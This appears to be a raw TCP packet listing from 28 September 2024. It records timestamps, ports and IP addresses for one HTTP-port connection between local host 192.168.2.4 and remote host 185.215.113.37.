Sep 28, 2024 07:32:11.922591925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922616959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922627926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922660112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922848940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922879934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922888041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922913074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922921896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922945023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922960997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922979116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922986031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923011065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923021078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923046112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923051119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923090935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923165083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923199892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923213959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923240900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923248053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923279047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923291922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923311949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923317909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923345089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923352957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923403978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923430920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923463106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923471928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923495054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923499107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923527956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923537970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923561096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923569918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923594952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923604012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923628092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923635006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923660040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923670053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923700094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923701048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923744917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.923945904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.923974991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924005985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924010038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924020052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924037933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924043894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924069881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924082041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924102068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924112082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924134016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924143076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924168110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924175024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924200058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924209118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924232960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924241066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924266100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924273968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924298048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924307108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924329996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924340010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924362898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924372911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924395084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924403906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924427986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924436092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924463987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924469948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924506903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924705029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924736977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924753904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924767971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924784899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924802065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924815893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924833059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924843073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924866915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924869061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924900055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924911022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924931049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924941063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924967051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.924976110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.924998999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925009012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925031900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925040007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925064087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925072908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925096035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925101995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925139904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925441027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925472975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925487041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925506115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925512075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925538063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925553083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925570965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925575972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925604105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925614119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925636053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925645113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925668001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925678968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925702095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925709963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925734997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925743103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925769091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925775051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925811052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925817013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925843000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925854921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925887108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.925896883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.925935984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.007822990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.007858038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.007879019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.007894993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.007910013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.007944107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.007952929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.007980108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.007986069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008013964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008023024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008047104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008054018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008080959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008089066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008122921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008208990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008236885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008251905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008275032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008285046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008317947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008331060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008349895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008358955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008392096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008399963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008430958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008459091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008464098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008467913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008502007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008518934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008552074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008564949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008589983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008605957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008646965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008656025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008688927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008702040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008719921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008721113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008754015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008758068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008793116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008888006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008919001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008930922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008955956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.008960009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.008996964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009006023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009037971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009042025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009072065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009078979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009110928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009179115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009210110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009241104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009268999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009273052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009294033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009305954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009314060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009337902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009345055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009371996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009398937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009398937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009510040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009541035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009551048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009572983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009583950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009604931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009609938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009638071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009649038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009670019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009677887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009711981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009748936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009779930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009787083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009812117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009820938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009845018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009855032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009927988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009942055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009963036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009968996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.009994984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.009999990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010027885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010039091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010060072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010067940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010097980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010099888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010133028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010142088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010164976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010171890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010206938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010231018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010262966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010272980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010303020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010305882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010344028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010349035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010380030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010386944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010411978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010416985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010446072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010453939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010477066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010487080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010512114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010539055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010566950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010566950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010577917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010804892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010832071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010852098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010863066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010869026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010895967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010909081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010929108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010937929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010963917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.010972977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.010997057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011015892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011029005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011034012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011061907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011069059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011096001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011102915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011130095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011137009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011169910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011313915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011346102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011358023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011379004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011415958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011415958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011423111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011455059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011461020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011487007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011493921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011518955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011532068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011550903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011557102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011585951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011591911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011626959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011826038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011857986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011872053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011889935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011900902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011921883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011926889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011955976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011962891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.011989117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.011997938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012022018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012029886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012053967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012063026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012088060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012090921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012119055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012130022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012151957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012161016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012182951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012195110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012216091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012223959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012243986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012255907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012276888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.012285948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.012310982 CEST	80	49730	185.215.113.37	192.168.2.4
